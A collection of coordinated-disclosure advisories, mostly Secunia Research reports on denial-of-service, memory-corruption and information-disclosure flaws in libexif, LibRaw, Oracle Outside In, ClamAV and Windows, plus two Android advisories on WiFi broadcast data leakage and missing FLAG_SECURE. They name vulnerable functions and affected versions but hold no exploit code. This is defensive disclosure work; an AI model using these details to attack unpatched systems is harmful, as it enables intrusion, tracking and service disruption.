Secunia Research: libexif EXIF_IFD_INTEROPERABILITY / EXIF_IFD_EXIF Denial of Service Vulnerability
== Secunia Research 2018/12/13 libexif EXIF_IFD_INTEROPERABILITY / EXIF_IFD_EXIF Denial of Service Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera8 Verification.9 == 1) Affected Software * libexif version 0.6.21. Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in libexif, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) An error when processing the EXIF_IFD_INTEROPERABILITY and EXIF_IFD_EXIF tags can be exploited to exhaust available CPU resources. The vulnerability is confirmed in version 0.6.21. Other versions may also be affected. == 4) Solution No official solution is currently available. == 5) Time Table 2018/09/12 - Maintainer contacted with the vulnerability details. 2018/09/27 - Maintainer contacted for a follow-up. 2018/09/28 - Maintainer confirmed the vulnerability. 2018/11/13 - Maintainer contacted for a follow-up highlighting disclosure policy margins. 2018/12/12 - Release of Secunia Advisory SA84652 based on the disclosure policy. 2018/12/13 - Public disclosure of Secunia Research Advisory. == 6) Credits Laurent Delosieres, Secunia Research at Flexera. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-20030 identifier for the vulnerability. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. https://www.flexera.com/products/software-vulnerability-management Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://www.flexera.com/company/secunia-research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered. https://www.flexera.com/company/secunia-research/advisories/ == 9) Verification Please verify this advisory by visiting the website: https://secuniaresearch.flexerasoftware.com/secunia_research/2018-28/ Complete list of vulnerability reports published by Secunia Research: https://www.flexera.com/company/secunia-research/advisories/ ==
Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities
== Secunia Research 2018/12/13 LibRaw Multiple Denial of Service Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera8 Verification.9 == 1) Affected Software * LibRaw versions prior to 0.19.1. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered multiple vulnerabilities in LibRaw, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) A type confusion error within the "unpacked_load_raw()" function (internal/dcraw_common.cpp) can be exploited to trigger an infinite loop. 2) An error within the "parse_rollei()" function (internal/dcraw_common.cpp) can be exploited to trigger an infinite loop. 3) An error within the "parse_sinar_ia()" function (internal/dcraw_common.cpp) can be exploited to exhaust available CPU resources. The vulnerabilities are confirmed in version 0.19.0 and reported in versions prior to 0.19.1. == 4) Solution Update to version 0.19.1. == 5) Time Table 2018/11/22 - Maintainer contacted with the vulnerability details. 2018/11/23 - Maintainer confirmed the vulnerability. 2018/11/23 - Maintainer released a fix. 2018/12/03 - Release of Secunia Advisory SA86384. 2018/12/13 - Public disclosure of Secunia Research Advisory. == 6) Credits Laurent Delosieres, Secunia Research at Flexera. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-5817, CVE-2018-5818, and CVE-2018-5819 identifiers for the vulnerability. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. https://www.flexera.com/products/software-vulnerability-management Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://www.flexera.com/company/secunia-research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered. https://www.flexera.com/company/secunia-research/advisories/ == 9) Verification Please verify this advisory by visiting the website: https://www.flexera.com/company/secunia-research/advisories/SR-2018-27.html Complete list of vulnerability reports published by Secunia Research: https://www.flexera.com/company/secunia-research/advisories/ ==
Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489]
[Blog post here: https://wwws.nightwatchcybersecurity.com/2018/08/29/sensitive-data-exposure-via-wifi-broadcasts-in-android-os-cve-2018-9489/] TITLE Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489] SUMMARY System broadcasts by Android OS expose information about the users device to all applications running on the device. This includes the WiFi network name, BSSID, local IP addresses, DNS server information and the MAC address. Some of this information (MAC address) is no longer available via APIs on Android 6 and higher, and extra permissions are normally required to access the rest of this information. However, by listening to these broadcasts, any application on the device can capture this information thus bypassing any permission checks and existing mitigations. Because MAC addresses do not change and are tied to hardware, this can be used to uniquely identify and track any Android device even when MAC address randomization is used. The network name and BSSID can be used to geolocate users via a lookup against a database of BSSID such as WiGLE or SkyHook. Other networking information can be used by rogue apps to further explore and attack the local WiFi network. All versions of Android running on all devices are believed to be affected including forks (such as Amazons FireOS for the Kindle). The vendor (Google) fixed these issues in Android P / 9 but does not plan to fix older versions. Users are encouraged to upgrade to Android P / 9 or later. CVE-2018-9489 has been assigned by the vendor to track this issue. Further research is also recommended to determine whether this is being exploited in the wild. BACKGROUND Android is an open source operating system developed by Google for mobile phones and tablets. It is estimated that over two billion devices exist worldwide running Android. Applications on Android are usually segregated by the OS from each other and the OS itself. However, interaction between processes and/or the OS is still possible via several mechanisms. In particular, Android provides the use of Intents as one of the ways for inter-process communication. A broadcast using an Intent allows an application or the OS to send a message system-wide which can be listened to by other applications. While functionality exists to restrict who is allowed to read such messages, application developers often neglect to implement these restrictions properly or mask sensitive data. This leads to a common vulnerability within Android applications where a malicious application running on the same device can spy on and capture messages being broadcast by other applications. Another security mechanism present in the Android is permissions. These are safeguards designed to protect the privacy of users. Applications must explicitly request access to certain information or features via a special uses-permission tag in the application manifest (AndroidManifest.xml). Depending on the type of permission (normal, dangerous, etc) the OS may display the permission information to the user during installation, or may prompt again during run-time. Some permissions can only be used by system applications and cannot be used by regular developers. VULNERABILITY DETAILS Android OS broadcasts information about the WiFi connection and the WiFi network interface on a regular basis using two intents: WifiManagers NETWORK_STATE_CHANGED_ACTION and WifiP2pManagers WIFI_P2P_THIS_DEVICE_CHANGED_ACTION. This information includes the MAC address of the device, the BSSID and network name of the WiFi access point, and various networking information such as the local IP range, gateway IP and DNS server addresses. This information is available to all applications running on the users device. While applications can also access this information via the WifiManager, this normally requires the ACCESS_WIFI_STATE permission in the application manifest. Geolocation via WiFi normally requires the ACCESS_FINE_LOCATION or ACCESS_COARSE_LOCATION permissions. Also, on Android versions 6.0 and later, the real MAC address of the device is no longer available via APIs and will always return the address 02:00:00:00:00:00. However, an application listening for system broadcasts does not need these permissions thus allowing this information to be captured without the knowledge of the user and the real MAC address being captured even on Android 6 or higher. We performed testing using a test farm of mobile device ranging across multiple types of hardware and Android versions. All devices and versions of Android tested confirmed this behavior, although some some devices do not display the real MAC address in the NETWORK_STATE_CHANGED_ACTION intent but they still do within the WIFI_P2P_THIS_DEVICE_CHANGED_ACTION intent. We also tested at least one fork (Amazons FireOS for the Kindle) and those devices displayed the same behavior. Because MAC addresses do not change and are tied to hardware
Secunia Research: Oracle Outside In Technology Multiple Vulnerabilities
== Secunia Research 2018/07/20 Oracle Outside In Technology Multiple Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Oracle Outside In Technology version 8.5.3. == 2) Severity Rating: Moderately critical Impact: Exposure of sensitive information and Denial of Service Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered multiple vulnerabilities in Oracle Outside In Technology, which can be exploited by malicious people to disclose potentially sensitive information and cause a DoS (Denial of Service). 1) An error in the vsxl5.dll when processing GelFrame objects can be exploited to cause a out-of-bounds read memory access. 2) An integer underflow error in the vsxl5.dll can be exploited to cause an out-of-bounds read memory access. 3) An error when processing "Body" element of HTML file can be exploited to cause a null pointer dereference. 4) An error within the "readChartStyles()" function (vswk6.dll) can be exploited to cause a null pointer dereference. 5) An error in the vswk6.dll can be exploited to cause an out-of-bounds read memory access. 6) An error within the "readChartStyles()" function (vswk6.dll) can be exploited to trigger an infinite loop. 7) An error within the vswk6.dll can be exploited to disclose uninitialized memory or cause a crash. 8) Another error within the vswk6.dll can be exploited to disclose uninitialized memory or cause a crash. 9) Another error within the vswk6.dll can be exploited to disclose uninitialized memory or cause a crash. 10) Another error within the vswk6.dll can be exploited to disclose uninitialized memory or cause a crash. The vulnerabilities are confirmed in version 8.5.3. Other versions may also be affected. == 4) Solution Apply update. https://support.oracle.com/rs?type=doc=2394520.1 == 5) Time Table 2018/03/26 Vendor notified about vulnerabilities. 2018/03/29 Vendor supplied bug ticket ID. 2018-05-25 Vendor status update. 2018-06-06 Vendor asks for additional details. 2018-06-06 Vendor is provided with further analysis of the vulnerabilities. 2018-06-26 - Vendor supplies information on fix in main codeline. 2018/07/17 - Release of vendor patch. 2018/07/18 - Release of Secunia Advisory SA81459. 2018/07/20 - Public disclosure of Secunia Research Advisory. == 6) Credits Behzad Najjarpour Jabbari, Secunia Research at Flexera == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-2992, CVE-2018-3009, CVE-2018-3093, CVE-2018-3094, CVE-2018-3095, CVE-2018-3096, CVE-2018-3098, CVE-2018-3097,CVE-2018-3103, and CVE-2018-3104 identifier for the vulnerabilities. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. https://www.flexera.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individual
Secunia Research: Oracle Outside In Technology Multiple Vulnerabilities
== Secunia Research 2018/07/20 Oracle Outside In Technology Multiple Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Oracle Outside In Technology version 8.5.3. == 2) Severity Rating: Highly critical Impact: System Access Where: Remote == 3) Description of Vulnerabilities Secunia Research has discovered multiple vulnerabilities in Oracle Outside In Technology, which can be exploited by malicious people to compromise a vulnerable system. 1) An error within the "VwStreamRead()" function (vsdrw.dll) can be exploited to cause a heap-based buffer overflow. 2) A boundary error in the vsxl5.dll can be exploited to cause a heap-based buffer overflow. 3) Another boundary error in the vsxl5.dll can be exploited to cause a heap-based buffer overflow. 4) An integer underflow error within the "VwStreamOpen()" function (vswk6.dll) can be exploited to cause an out-of-bounds write memory access. The vulnerabilities are confirmed in version 8.5.3. Other versions may also be affected. == 4) Solution Apply update. https://support.oracle.com/rs?type=doc=2394520.1 == 5) Time Table 2018/03/26 Vendor notified about vulnerabilities. 2018/03/29 Vendor supplied bug ticket ID. 2018-05-25 Vendor status update. 2018-06-06 Vendor asks for additional details. 2018-06-06 Vendor is provided with further analysis of the vulnerabilities. 2018-06-26 - Vendor supplies information on fix in main codeline. 2018/07/17 - Release of vendor patch. 2018/07/18 - Release of Secunia Advisory SA81459. 2018/07/20 - Public disclosure of Secunia Research Advisory. == 6) Credits Behzad Najjarpour Jabbari, Secunia Research at Flexera == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-3102, CVE-2018-3010, CVE-2018-3092, and CVE-2018-3099 identifier for the vulnerabilities. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. https://www.flexera.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://www.flexera.com/enterprise/company/about/secunia-research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered. https://secuniaresearch.flexerasoftware.com/
Secunia Research: LibRaw "parse_minolta()" Infinite Loop Denial of Service Vulnerability
== Secunia Research 2018/07/17 LibRaw "parse_minolta()" Infinite Loop Denial of Service Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera ...8 Verification.9 == 1) Affected Software * LibRaw versions prior to 0.18.11. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in LibRaw, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) An error within the "parse_minolta()" function (dcraw/dcraw.c) can be exploited to trigger an infinite loop via a specially crafted file. The vulnerability is confirmed in version 0.18.10. Prior versions may also be affected. == 4) Solution Update to version 0.18.11. == 5) Time Table 2018/05/09 - Maintainer contacted with the vulnerability details. 2018/05/10 - Maintainer confirmed the vulnerability. 2018/05/10 - Maintainer released a fix. 2018/05/15 - Release of Secunia Advisory SA83050. 2018/07/19 - Public disclosure of Secunia Research Advisory. == 6) Credits Kasper Leigh Haabb, Secunia Research at Flexera == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-5813 identifier for the vulnerability. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. https://www.flexera.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://www.flexera.com/enterprise/company/about/secunia-research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered. https://secuniaresearch.flexerasoftware.com/community/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia Research website: https://secuniaresearch.flexerasoftware.com/secunia_research/2018-13/ ==
Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities
== Secunia Research 2018/07/17 LibRaw Multiple Denial of Service Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera ...8 Verification.9 == 1) Affected Software * LibRaw versions prior to 0.18.12. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered multiple vulnerabilities in LibRaw, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) An integer overflow error within the "parse_qt()" function (internal/dcraw_common.cpp) can be exploited to trigger an infinite loop via a specially crafted Apple QuickTime file. 2) An integer overflow error within the "identify()" function (internal/dcraw_common.cpp) can be exploited to trigger a division by zero via specially crafted NOKIARAW file. Note: The vulnerability #2 is caused due to an incomplete fix for CVE-2018-5804. The vulnerabilities are confirmed in version 0.18.11. Prior versions may also be affected. == 4) Solution Update to version 0.18.12. == 5) Time Table 2018/06/08 - Maintainer contacted with the vulnerability details. 2018/06/11 - Maintainer confirmed the vulnerabilities. 2018/06/11 - Maintainer released a fix. 2018/06/13 - Release of Secunia Advisory SA83507. 2018/07/19 - Public disclosure of Secunia Research Advisory. == 6) Credits Kasper Leigh Haabb, Secunia Research at Flexera == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-5815 and CVE-2018-5816 identifiers for the vulnerabilities. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. https://www.flexera.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://www.flexera.com/enterprise/company/about/secunia-research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered. https://secuniaresearch.flexerasoftware.com/community/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia Research website: https://secuniaresearch.flexerasoftware.com/secunia_research/2018-14/ ==
Secunia Research: Clam AntiVirus "parsehwp3_paragraph()" Denial of Service Vulnerability
== Secunia Research 2018/07/12 Clam AntiVirus "parsehwp3_paragraph()" Denial of Service Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera8 Verification.9 == 1) Affected Software * Clam AntiVirus versions prior to 0.100.1. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Clam AntiVirus, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) An integer overflow error within the "parsehwp3_paragraph()" function (libclamav/hwp.c) can be exploited to trigger an infinite loop via a specially crafted Hangul Word Processor file. The vulnerability is confirmed in version 0.100.0 and reported in versions prior to 0.100.1. == 4) Solution Update to version 0.100.1. == 5) Time Table 2018/05/18 - Maintainer contacted with the vulnerability details. 2018/05/21 - Maintainer confirmed the vulnerability. 2018/07/09 - Maintainer released a fix. 2018/07/11 - Release of Secunia Advisory SA82000. 2018/07/12 - Public disclosure of Secunia Research Advisory. == 6) Credits Laurent Delosieres, Secunia Research at Flexera. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-0360 identifier for the vulnerability. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com/enterprise/company/about/ Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexera.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://secuniaresearch.flexera.com/community/research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered. https://secuniaresearch.flexera.com/community/advisories/ == 9) Verification Please verify this advisory by visiting the website: https://secuniaresearch.flexera.com/secunia_research/2018-12 ==
Android OS Didnt use FLAG_SECURE for Sensitive Settings [CVE-2017-13243]
[Blog post here: https://wwws.nightwatchcybersecurity.com/2018/05/24/android-os-didnt-use-flag_secure-for-sensitive-settings-cve-2017-13243/] SUMMARY Android OS did not use the FLAG_SECURE flag for sensitive settings, potentially exposing sensitive data to other applications on the same device with the screen capture permissions. The vendor (Google) fixed this issue in 2018-02-01 Pixel security update. Google has assigned CVE-2017-13243 to track this issue. DETAILS Android OS is a mobile operating systems for phones and tablets developed by Google. The OS has multiple screens where sensitive information maybe shown such as the device lock screen, passwords in the WiFi settings, pairing codes for Bluetooth, etc. FLAG_SECURE is a special flag available to Android developers that prevents a particular screen within an application from being seen by other application with screen capture permissions, having screenshots taken by the user, or have the screen captured in the Recent Apps portion of Android OS. We have published an extensive post last year discussing this feature is and what it does: https://wwws.nightwatchcybersecurity.com/2016/04/13/research-securing-android-applications-from-screen-capture/ During our testing of various Google mobile applications, we found that the lock screen, password entry screen for WiFi, and the screen for entering pairing codes for Bluetooth devices did not use FLAG_SECURE to prevent other applications for capturing that information. By contrast other Google applications like Android Pay and Google Wallet use this flag to prevent capture of sensitive information. Exploiting this bug requires user cooperation in installing a malicious app and activating the actual screen capture process, thus the likelihood of exploitation is low. To reproduce: 1. Lock the device, OR go to WiFi settings and try to add a network, or try to pair a Bluetooth device. 2. Press Power and volume down to capture screenshot. 3. Confirm that a screenshot can be taken. All testing was done on Android 7.1.2, security patch level of May 5th, 2017, on Nexus 6P. Vulnerable versions of Android include: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 and 8.0. VENDOR RESPONSE This issue was responsibly reported to the vendor and was fixed in the 2018-02-01 Pixel bulletin. The vendor assigned CVE-2017-13243 to track this issue. BOUNTY INFORMATION This issue satisfied the requirements of the Android Security Rewards program and a bounty was paid. REFERENCES Android ID # A-38258991 CVE ID: CVE-2017-13243 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13243 CVSS scores: 7.5 (CVSS v3.0) / 5.0 (CVSS v2.0) Google Bug # 38254822 Google Pixel Bulletin: 2018-02-1 https://source.android.com/security/bulletin/pixel/2018-02-01 CREDITS Advisory written by Yakov Shafranovich. TIMELINE 2017-05-12: Initial report to the vendor 2017-06-15: Follow-up information sent to the vendor 2017-06-19: Follow-up communication with the vendor 2018-01-02: Vendor communicates plan to patch this issue 2018-01-29: Bounty reward issued 2018-02-01: Vendor publishes a patch for this issue 2018-05-24: Public disclosure / advisory published
Secunia Research: Oracle Outside In Technology Use-After-Free Vulnerability
== Secunia Research 2018/04/25 Oracle Outside In Technology Use-After-Free Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software Oracle Outside In Technology version 8.5.3. == 2) Severity Rating: Highly critical Impact: System Access Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Oracle Outside In Technology, which can be exploited by malicious people to compromise a vulnerable system. 1) A use-after-free error in vshtml.dll within the "Outside In Filters" subcomponent can be exploited to corrupt memory. == 4) Solution Apply update. https://support.oracle.com/rs?type=doc=2353306.1 == 5) Time Table 2017/11/08 Vendor notified about vulnerability. 2017/11/14 Vendor supplied bug ticket ID. 2017/11/26 Vendor status update. 2017/12/05 Vendor asks for additional details. 2017/12/06 Vendor is provided with further analysis of the vulnerability. 2017/12/26 - Vendor supplies information of fix in main codeline. 2018/04/17 - Release of vendor patch. 2018/04/17 - Release of Secunia Advisory SA72227. 2018/04/25 - Public disclosure of Secunia Research Advisory. == 6) Credits Behzad Najjarpour Jabbari, Secunia Research at Flexera == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-2806 identifier for the vulnerability. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. https://www.flexera.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://www.flexera.com/enterprise/company/about/secunia-research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered. https://secuniaresearch.flexerasoftware.com/community/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: https://secuniaresearch.flexerasoftware.com/secunia_research/2018-07/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: Microsoft Windows Embedded OpenType Font Engine hdmx Table Information Disclosure Vulnerability
== Secunia Research 2018/03/15 Microsoft Windows Embedded OpenType Font Engine hdmx Table Information Disclosure Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Microsoft Windows 7 * Microsoft Windows Server 2008 == 2) Severity Rating: Moderately critical Impact: Information Disclosure Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to disclose certain information. The vulnerability is caused due to an error when processing hdmx table and can be exploited to cause an out-of-bounds read memory access. == 4) Solution Apply update. == 5) Time Table 2017/12/06 Reported vulnerability. 2017/12/07 Vendor status update. 2017/12/15 Vendor notified about vulnerability. 2018/02/13 Vendor patch release. 2018/02/14 Secunia Advisory SA7 release. 2018/03/14 - Public disclosure of Secunia Research Advisory. == 6) Credits Hossein Lotfi, Secunia Research at Flexera. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-0761 identifiers for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software Vulnerability, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing Vulnerability should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address Vulnerability in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software Vulnerability. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and Vulnerability and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: https://secuniaresearch.flexerasoftware.com/secunia_research/2018-05/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: Microsoft Windows Embedded OpenType Font Engine "MTX_IS_MTX_Data()" Information Disclosure Vulnerability
== Secunia Research 2018/03/15 Microsoft Windows Embedded OpenType Font Engine "MTX_IS_MTX_Data()" Information Disclosure Vulnerability == Table of Contents Affected Software1 Severity.2 Description of vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Microsoft Windows 7 * Microsoft Windows Server 2008 == 2) Severity Rating: Moderately critical Impact: Information Disclosure Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to disclose certain information. The vulnerability is caused due to an error within the "MTX_IS_MTX_Data()" function (t2embed.dll) and can be exploited to cause an out-of-bounds read memory access. == 4) Solution Apply update. == 5) Time Table 2017/11/03 - Vendor notified about vulnerability. 2017/11/03 - Vendor response. 2017/11/05 Vendor status update. 2017/11/13 Replied to vendor. 2017/11/15 Vendor status update. 2017/11/22 Vendor status update. 2017/11/30 Vendor status update 2018/02/13 Vendor patch release. 2018/02/14 Secunia Advisory SA7 release. 2018/03/14 - Public disclosure of Secunia Research Advisory. == 6) Credits Hossein Lotfi, Secunia Research at Flexera. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-0755 identifier for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive 